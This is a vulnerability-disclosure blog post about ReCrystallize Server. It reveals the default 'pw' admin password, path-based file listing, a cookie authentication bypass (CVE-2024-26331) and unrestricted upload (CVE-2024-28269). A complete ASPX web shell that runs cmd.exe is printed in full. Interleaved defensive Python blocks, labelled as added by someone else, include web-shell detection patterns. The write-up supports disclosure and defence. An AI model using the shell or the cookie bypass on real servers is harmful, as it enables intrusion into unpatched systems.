rss-bridge 2024-03-22T07:47:02+00:00

From Discovery to Disclosure: ReCrystallize Server Vulnerabilities

TL;DR – While on an assessment, I found an instance of ReCrystallize Server. It had many problems: some were due to insufficient hardening on the client’s side, while others were new vulnerabilities I found that, when chained together, achieve Remote Code Execution (RCE). These vulnerabilities were disclosed to ReCrystallize Software and MITRE.

Besides the disclosed vulnerabilities, some “features” were also used for malicious purposes. The replication and validation of the findings were done on my own test environment.


This blog post was made public even though, as far as I am aware, no patch is available, because the vendor stopped replying after multiple interactions.

Hunting for vulnerabilities

This blog post tells the tale of finding two vulnerabilities in ReCrystallize Server software. It started with a web application assessment that was not special in any way. The application in scope was meant for internal use only and the core application was kind of boring. This changed when the application threw some errors when I tried to print a report. Looking at the error is where the fun began!

The error showed that third-party software was used for printing reports. The third-party software was ‘ReCrystallize Server’ and was a standalone application.

I had never heard of this software before and assumed it had something to do with SAP Crystal Reports. From here, I could follow the road in two directions: read the documentation and look for known vulnerabilities in this software, or hit the login page and see what would happen. My curiosity was triggered, so I just smashed the Log In button.

Credentials like ‘admin/admin’ or ‘admin/password’ did not work, so back to direction number one. Let’s look for known vulnerabilities.

The first hit was a bit misleading as the subject was not about vulnerabilities. Are there any known CVEs perhaps?

It seems that this application is completely secure. As often happens on assessments, I was short on time. So, let’s skip it, right?

In the image above you see a search result referring to an installation guide. Perhaps some juicy information is disclosed in there, so I decided to have a look. This was not a wrong decision!

Ok… My short list with default passwords did not work at first, but surely the password is not really ‘pw’? It actually was.

System Info, Settings, Manage Files… I can smell it already: probably an over-privileged process! The first thing I could think of was uploading a web shell via ‘Manage Files’. Unfortunately, that functionality was not working since no license was present. Next would be ‘System Info’ to gather some information about the system.

Let’s have a look at what could be important. Based on this information we know that the application runs on the system drive (C:). This is useful to know for command execution payloads or Local File Inclusion (LFI) vulnerabilities. The process is running as ‘NT AUTHORITY\SYSTEM’, which is a local account with the highest privileges. We also now know where ReCrystallize Server is installed and would therefore be able to find out where files are going to be stored. In this example you can also see that the server is domain joined (no, this is not a client domain; I made an effort to set up a lab environment).

You might remember the ‘Settings’ button being present as an administrator function. A lot of options were present under settings such as configuring database credentials, configuring SMTP server settings, etc. None of them were configured, but I wanted to highlight one setting.

As the admin user, I was able to allow the use of absolute paths. This seemed like an important setting to me, but later in this post you will find out that it really is not. This looks like the start of Local File Inclusion.

The installation manual I mentioned earlier showed this:

Apparently, the application can view the contents of a folder specified in the ‘folderName’ parameter. Since I allowed absolute paths, let’s see the functionality in action.

Sweet, I can see the contents of ‘C:\Program Files (x86)’. I just wished there were a way to get the files instead of folders. While playing around with the application and crawling through the manual, I found I was able to download files from the server.
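The listing above works because a client-supplied ‘folderName’ is used as-is once absolute paths are allowed. As an added example (my own code, not the post’s and not ReCrystallize Software’s), this is how a server can confine such a parameter to a report root regardless of any “allow absolute paths” setting: refuse anything anchored by a drive letter, UNC prefix or root in either Windows or POSIX syntax, then resolve the joined path and require that it still lies under the root. The function names, the report root and the sample tree are assumptions constructed for the demo.

```python
import tempfile
from pathlib import Path, PurePosixPath, PureWindowsPath
from typing import Dict, List


def is_anchored(folder_name: str) -> bool:
    """True if folder_name carries a drive, UNC prefix or root in either
    Windows or POSIX syntax (e.g. 'C:\\x', '\\\\srv\\share', '/etc', 'C:x').
    Checked up front because pathlib's '/' operator silently discards the
    left operand when the right one is absolute."""
    return bool(PureWindowsPath(folder_name).anchor or PurePosixPath(folder_name).anchor)


def resolve_report_folder(report_root: str, folder_name: str) -> Path:
    """Map a client-supplied folderName onto the on-disk report root.

    Raises ValueError unless the resolved path is inside report_root, so
    absolute paths and '..' traversal are both refused."""
    if is_anchored(folder_name):
        raise ValueError(f"absolute folderName refused: {folder_name!r}")
    root = Path(report_root).resolve()
    candidate = (root / folder_name.replace("\\", "/")).resolve()
    try:
        candidate.relative_to(root)
    except ValueError:
        raise ValueError(f"folderName escapes report root: {folder_name!r}") from None
    return candidate


def list_report_folder(report_root: str, folder_name: str) -> List[str]:
    """Directory listing the way the feature is meant to be used: only names
    under the confined folder, never the full on-disk path."""
    folder = resolve_report_folder(report_root, folder_name)
    if not folder.is_dir():
        raise FileNotFoundError(folder_name)
    return sorted(p.name for p in folder.iterdir())


def make_demo_root() -> str:
    """Constructed sample tree: <tmp>/2024/{q1.rpt,q2.rpt} (assumption, demo only)."""
    root = tempfile.mkdtemp(prefix="recrystallize-demo-")
    (Path(root) / "2024").mkdir()
    for name in ("q1.rpt", "q2.rpt"):
        (Path(root) / "2024" / name).write_text("constructed sample report")
    return root


def demo() -> Dict[str, object]:
    """One legitimate listing plus the kinds of folderName values seen in the post."""
    root = make_demo_root()
    results: Dict[str, object] = {"2024": list_report_folder(root, "2024")}
    for bad in ("..", "../..", "C:\\Program Files (x86)", "/etc", "2024/../../.."):
        try:
            resolve_report_folder(root, bad)
            results[bad] = "ALLOWED"
        except ValueError:
            results[bad] = "refused"
    return results


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key!r:32} -> {value}")
```

The two checks are deliberately redundant: the anchor test catches Windows-style absolute paths even when the code runs on a non-Windows host, and the `relative_to` test catches everything else, including traversal that passes through a legitimate subfolder first.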

I exploited this a bit to get access to network shares, extract information about the associated Active Directory environment, and obtain database credentials.

Although I was not able to upload a web shell, I was happy with it and ready to notify the client. As if it was written in the almighty guidelines of system administrators, the reaction was:

“You were only able to do that because we did not configure it. After hardening the configuration, this would not be possible anymore”

Hmm, challenge accepted then. The next morning, I was able to retest the findings on the ‘hardened’ configuration of ReCrystallize Server.

For those who watched Top Gear with James May: “Bollocks”! The default password was of course changed, and the use of absolute paths was disabled. This shouldn’t be happening!

CVE-2024-26331
Luckily, I took note of some strange behaviour before the client reconfigured the ReCrystallize Server. On some occasions, the session of the core application expired, but I was able to continue in the third-party software ReCrystallize Server. I also noted a cookie being set only for ReCrystallize Server, namely ‘AdminUsername=admin’.

Nice, I have administrative access again!
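The root cause here is that the identity lives in a cookie value the client controls, so whoever sets it is an administrator. As an added example (my own code, not the post’s and not ReCrystallize Software’s), the block below puts that check next to a hardened one: the server issues a cookie whose claims are bound by an HMAC-SHA256 tag under a key the client never sees, verified in constant time and with an expiry. The cookie name ‘Session’, the claim layout and the in-process key are assumptions made for the demo.

```python
import base64
import binascii
import hashlib
import hmac
import json
import secrets
import time
from typing import Optional

# Assumption: in a real deployment this comes from a protected secret store.
# Generated per process here so the example runs stand-alone.
SERVER_KEY = secrets.token_bytes(32)


def vulnerable_is_admin(cookies: dict) -> bool:
    """The pattern the post describes: the presence of AdminUsername=admin
    is the whole authorization check."""
    return cookies.get("AdminUsername") == "admin"


def _b64encode(raw: bytes) -> bytes:
    return base64.urlsafe_b64encode(raw).rstrip(b"=")


def _b64decode(data: bytes) -> Optional[bytes]:
    try:
        return base64.urlsafe_b64decode(data + b"=" * (-len(data) % 4))
    except (binascii.Error, ValueError):
        return None


def issue_session(username: str, ttl_seconds: int = 900, key: bytes = SERVER_KEY,
                  now: Optional[int] = None) -> str:
    """Server-issued cookie value: base64(claims) '.' base64(HMAC-SHA256 tag).
    Only the holder of `key` can produce a valid tag, so the claims cannot be
    altered or invented on the client side."""
    now = int(time.time()) if now is None else now
    claims = {"sub": username, "exp": now + ttl_seconds, "nonce": secrets.token_hex(8)}
    body = _b64encode(json.dumps(claims, separators=(",", ":")).encode())
    tag = hmac.new(key, body, hashlib.sha256).digest()
    return (body + b"." + _b64encode(tag)).decode("ascii")


def verify_session(token: str, key: bytes = SERVER_KEY,
                   now: Optional[int] = None) -> Optional[str]:
    """Return the username if the tag checks out and the session is unexpired;
    None for anything forged, tampered, malformed or stale."""
    now = int(time.time()) if now is None else now
    body, sep, tag = token.encode("ascii", "ignore").partition(b".")
    given = _b64decode(tag) if sep else None
    if given is None:
        return None
    expected = hmac.new(key, body, hashlib.sha256).digest()
    if not hmac.compare_digest(expected, given):  # constant-time comparison
        return None
    raw = _b64decode(body)
    if raw is None:
        return None
    try:
        claims = json.loads(raw)
    except ValueError:
        return None
    if not isinstance(claims, dict) or not isinstance(claims.get("exp"), int):
        return None
    if claims["exp"] <= now:
        return None
    return claims.get("sub")


def hardened_is_admin(cookies: dict, key: bytes = SERVER_KEY,
                      now: Optional[int] = None) -> bool:
    """Identity comes from the verified token, never from the raw cookie text."""
    return verify_session(cookies.get("Session", ""), key, now) == "admin"


def unsigned_admin_claims() -> str:
    """Constructed negative test vector: well-formed admin claims with a
    zero tag, i.e. what can be built without the server key."""
    body = _b64encode(json.dumps({"sub": "admin", "exp": 2 ** 40}).encode())
    return (body + b"." + _b64encode(b"\x00" * 32)).decode("ascii")


if __name__ == "__main__":
    print("vulnerable check, client-set cookie:", vulnerable_is_admin({"AdminUsername": "admin"}))
    print("hardened check, unsigned claims:    ", hardened_is_admin({"Session": unsigned_admin_claims()}))
    print("hardened check, server-issued:      ", hardened_is_admin({"Session": issue_session("admin")}))
```

A server-side session store keyed by a random identifier is an equally valid design; the point either way is that the client can present a credential but cannot author one. The cookie should additionally be marked `HttpOnly` and `Secure`, and be invalidated when the core application’s session ends, since the post shows the two expiring independently.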

CVE-2024-28269
With a license now present, it was possible to use the ‘Manage Files’ feature. This happened to be a way to upload files without restrictions. Unrestricted File Upload? Let’s get RCE!

Uploading a default ASPX web shell would probably raise an alert. We could use obfuscation and all kinds of other tricks. Instead, I wanted to keep things simple when I searched for an appropriate web shell on the Internet. I created two files, report.aspx and report.aspx.cs, where accessing report.aspx executes the code in report.aspx.cs. In this case I simply executed the systeminfo command.

Content of report.aspx:

<%@ Page Language="C#" AutoEventWireup="true" CodeFile="report.aspx.cs" Inherits="Report.Template" %>

<!DOCTYPE html>
<html>
<head>
<title>Report Template</title>
</head>
<body>
<h1>Report Results:</h1>
<pre><asp:Literal runat="server" ID="ReportOutput" EnableViewState="false" /></pre>
</body>
</html>

Content of report.aspx.cs:

using System;
using System.Diagnostics;

namespace Report
{
    public partial class Template : System.Web.UI.Page
    {
        protected void Page_Load(object sender, EventArgs e)
        {
            // Set up process info
            var processStartInfo = new ProcessStartInfo
            {
                FileName = "cmd.exe",
                Arguments = "/c systeminfo", // Replace with your desired target
                RedirectStandardOutput = true,
                UseShellExecute = false,
                CreateNoWindow = true
            };

            // Start the process
            using (var process = new Process { StartInfo = processStartInfo })
            {
                process.Start();
                string output = process.StandardOutput.ReadToEnd();
                process.WaitForExit();

                // Display the output on the web page
                ReportOutput.Text = output;
            }
        }
    }
}

The image below shows the result of calling report.aspx.
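‘Manage Files’ accepted report.aspx and report.aspx.cs without any restriction (CVE-2024-28269), and the two files above are what turned that into code execution. As an added example (my own code, not the post’s and not ReCrystallize Software’s), the block below shows the two defensive counterparts: an allow-list validator for an upload feature of this kind, and an incident-response sweep of an existing upload directory that flags files by server-executable extension or by the content indicators present in the web shell shown above. The allowed extensions, function names and the constructed sample files are assumptions for the demo; the indicator patterns are taken from the post’s own code.

```python
import os
import re
import tempfile
from pathlib import Path, PurePosixPath, PureWindowsPath
from typing import List, Tuple

# Assumption: the file types a report server legitimately needs to accept.
ALLOWED_EXTENSIONS = {".rpt", ".pdf", ".csv", ".xlsx"}

# Anything IIS/ASP.NET would compile, execute or treat as configuration.
SERVER_EXECUTABLE = {".aspx", ".ascx", ".ashx", ".asmx", ".asax", ".cs", ".vb",
                     ".config", ".dll", ".exe", ".ps1", ".bat", ".cmd", ".svc"}

# Content indicators drawn from the web shell in the post: a page directive
# and process-spawning calls have no place inside an uploaded report.
SHELL_INDICATORS = [
    re.compile(rb"<%@\s*Page\b", re.IGNORECASE),
    re.compile(rb"ProcessStartInfo|System\.Diagnostics\.Process\b"),
    re.compile(rb"\bcmd\.exe\b|\bpowershell(\.exe)?\b", re.IGNORECASE),
    re.compile(rb"\bRequest\s*\[\s*[\"']", re.IGNORECASE),
]


def scan_content(content: bytes) -> str:
    """First indicator pattern that matches, or '' if none do."""
    for pattern in SHELL_INDICATORS:
        if pattern.search(content):
            return pattern.pattern.decode("ascii", "replace")
    return ""


def check_upload(filename: str, content: bytes) -> Tuple[bool, str]:
    """Allow-list validation for a 'Manage Files' style upload. Returns (accepted, reason)."""
    # Refuse path separators (either syntax), drive letters and NTFS stream syntax.
    if (filename != PureWindowsPath(filename).name
            or filename != PurePosixPath(filename).name or ":" in filename):
        return False, "path components or stream syntax in filename"
    # Windows strips trailing dots/spaces, so 'shell.aspx.' would land as 'shell.aspx'.
    if not filename or filename != filename.rstrip(". "):
        return False, "empty name or trailing dot/space in filename"
    suffixes = [s.lower() for s in PureWindowsPath(filename).suffixes]
    if not suffixes:
        return False, "no extension"
    # Check every suffix, not just the last: 'report.aspx.cs' and 'x.rpt.aspx' both fail.
    if any(s in SERVER_EXECUTABLE for s in suffixes):
        return False, f"server-executable extension in {suffixes}"
    if suffixes[-1] not in ALLOWED_EXTENSIONS:
        return False, f"extension {suffixes[-1]} not on allow-list"
    hit = scan_content(content)
    if hit:
        return False, f"content matches web-shell indicator {hit}"
    return True, "ok"


def hunt_webshells(root: str) -> List[Tuple[str, str]]:
    """Incident-response sweep of an existing upload directory."""
    findings = []
    for dirpath, _, names in os.walk(root):
        for name in names:
            path = Path(dirpath) / name
            rel = str(path.relative_to(root))
            if any(s.lower() in SERVER_EXECUTABLE for s in path.suffixes):
                findings.append((rel, "server-executable extension"))
                continue
            hit = scan_content(path.read_bytes())
            if hit:
                findings.append((rel, hit))
    return sorted(findings)


# Constructed samples: the two files from the post, abbreviated, plus a benign report.
WEBSHELL_ASPX = (b'<%@ Page Language="C#" AutoEventWireup="true" '
                 b'CodeFile="report.aspx.cs" Inherits="Report.Template" %>')
WEBSHELL_CS = (b'var processStartInfo = new ProcessStartInfo '
               b'{ FileName = "cmd.exe", Arguments = "/c systeminfo" };')
BENIGN_RPT = b"constructed sample report payload"


def demo_hunt() -> List[Tuple[str, str]]:
    """Build a throwaway upload directory and sweep it."""
    root = tempfile.mkdtemp(prefix="uploads-")
    (Path(root) / "report.aspx").write_bytes(WEBSHELL_ASPX)
    (Path(root) / "report.aspx.cs").write_bytes(WEBSHELL_CS)
    (Path(root) / "q1.rpt").write_bytes(BENIGN_RPT)
    (Path(root) / "notes.rpt").write_bytes(WEBSHELL_CS)  # shell source hidden behind an allowed extension
    return hunt_webshells(root)


if __name__ == "__main__":
    for name, data in (("report.aspx", WEBSHELL_ASPX), ("report.aspx.cs", WEBSHELL_CS), ("q1.rpt", BENIGN_RPT)):
        print(f"{name:16} -> {check_upload(name, data)}")
    for rel, why in demo_hunt():
        print(f"flagged {rel}: {why}")
```

Extension checks alone are not enough, which is why the validator also inspects content and why the sweep does the same. Storing uploads outside the web root under a server-generated name, and running the worker as a low-privilege account rather than ‘NT AUTHORITY\SYSTEM’, limit what any file that slips through can do.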

This was extremely fun, and the client was happy and amazed with the results. The fact that I only needed to place a specific cookie blew their mind. In agreement with the client, I disclosed the vulnerability to ReCrystallize Software.

[...]


Original source

📄 ReCrystallize%20Server%20Installation%20and%20Administration.pdf
